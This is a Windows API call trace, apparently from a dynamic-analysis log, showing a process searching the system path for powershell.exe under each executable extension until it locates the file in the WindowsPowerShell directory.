	[0122.895] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.ps1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.895] SetErrorMode (uMode=0x1) returned 0x1
	[0122.895] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.895] SetErrorMode (uMode=0x1) returned 0x1
	[0122.895] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psm1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.895] SetErrorMode (uMode=0x1) returned 0x1
	[0122.895] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.896] SetErrorMode (uMode=0x1) returned 0x1
	[0122.896] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psd1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.896] SetErrorMode (uMode=0x1) returned 0x1
	[0122.896] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.896] SetErrorMode (uMode=0x1) returned 0x1
	[0122.896] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.COM", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.896] SetErrorMode (uMode=0x1) returned 0x1
	[0122.897] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.897] SetErrorMode (uMode=0x1) returned 0x1
	[0122.897] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.EXE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.897] SetErrorMode (uMode=0x1) returned 0x1
	[0122.897] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.897] SetErrorMode (uMode=0x1) returned 0x1
	[0122.897] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.BAT", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.898] SetErrorMode (uMode=0x1) returned 0x1
	[0122.898] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.898] SetErrorMode (uMode=0x1) returned 0x1
	[0122.898] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.CMD", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.898] SetErrorMode (uMode=0x1) returned 0x1
	[0122.898] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.898] SetErrorMode (uMode=0x1) returned 0x1
	[0122.899] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.899] SetErrorMode (uMode=0x1) returned 0x1
	[0122.899] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.899] SetErrorMode (uMode=0x1) returned 0x1
	[0122.899] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.VBE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.899] SetErrorMode (uMode=0x1) returned 0x1
	[0122.899] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.900] SetErrorMode (uMode=0x1) returned 0x1
	[0122.900] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.900] SetErrorMode (uMode=0x1) returned 0x1
	[0122.900] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.900] SetErrorMode (uMode=0x1) returned 0x1
	[0122.900] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.JSE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.900] SetErrorMode (uMode=0x1) returned 0x1
	[0122.901] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.901] SetErrorMode (uMode=0x1) returned 0x1
	[0122.901] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSF", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.901] SetErrorMode (uMode=0x1) returned 0x1
	[0122.901] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.901] SetErrorMode (uMode=0x1) returned 0x1
	[0122.901] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.WSH", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.902] SetErrorMode (uMode=0x1) returned 0x1
	[0122.902] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0122.902] SetErrorMode (uMode=0x1) returned 0x1
	[0122.902] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.MSC", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.902] SetErrorMode (uMode=0x1) returned 0x1
	[0122.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.902] SetErrorMode (uMode=0x1) returned 0x1
	[0122.902] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.903] SetErrorMode (uMode=0x1) returned 0x1
	[0122.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.903] SetErrorMode (uMode=0x1) returned 0x1
	[0122.903] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.ps1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.903] SetErrorMode (uMode=0x1) returned 0x1
	[0122.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.903] SetErrorMode (uMode=0x1) returned 0x1
	[0122.903] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psm1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.904] SetErrorMode (uMode=0x1) returned 0x1
	[0122.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.904] SetErrorMode (uMode=0x1) returned 0x1
	[0122.904] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.psd1", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.904] SetErrorMode (uMode=0x1) returned 0x1
	[0122.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.905] SetErrorMode (uMode=0x1) returned 0x1
	[0122.905] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.COM", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.905] SetErrorMode (uMode=0x1) returned 0x1
	[0122.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.905] SetErrorMode (uMode=0x1) returned 0x1
	[0122.905] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.EXE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.905] SetErrorMode (uMode=0x1) returned 0x1
	[0122.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.906] SetErrorMode (uMode=0x1) returned 0x1
	[0122.906] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.BAT", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.906] SetErrorMode (uMode=0x1) returned 0x1
	[0122.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.906] SetErrorMode (uMode=0x1) returned 0x1
	[0122.906] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.CMD", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.906] SetErrorMode (uMode=0x1) returned 0x1
	[0122.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.907] SetErrorMode (uMode=0x1) returned 0x1
	[0122.907] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.907] SetErrorMode (uMode=0x1) returned 0x1
	[0122.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.907] SetErrorMode (uMode=0x1) returned 0x1
	[0122.907] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.VBE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.908] SetErrorMode (uMode=0x1) returned 0x1
	[0122.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.908] SetErrorMode (uMode=0x1) returned 0x1
	[0122.908] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JS", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.908] SetErrorMode (uMode=0x1) returned 0x1
	[0122.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.908] SetErrorMode (uMode=0x1) returned 0x1
	[0122.909] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.JSE", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.909] SetErrorMode (uMode=0x1) returned 0x1
	[0122.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.909] SetErrorMode (uMode=0x1) returned 0x1
	[0122.909] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSF", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.909] SetErrorMode (uMode=0x1) returned 0x1
	[0122.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.910] SetErrorMode (uMode=0x1) returned 0x1
	[0122.910] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.WSH", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.910] SetErrorMode (uMode=0x1) returned 0x1
	[0122.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0122.910] SetErrorMode (uMode=0x1) returned 0x1
	[0122.910] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.exe.MSC", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0122.910] SetErrorMode (uMode=0x1) returned 0x1
	[0122.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c60d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0122.911] SetErrorMode (uMode=0x1) returned 0x1
	[0122.911] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFindFileData=0x1c60d790 | out: lpFindFileData=0x1c60d790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1cddc6b0
	[0122.911] FindNextFileW (in: hFindFile=0x1cddc6b0, lpFindFileData=0x1c60d7a0 | out: lpFindFileData=0x1c60d7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
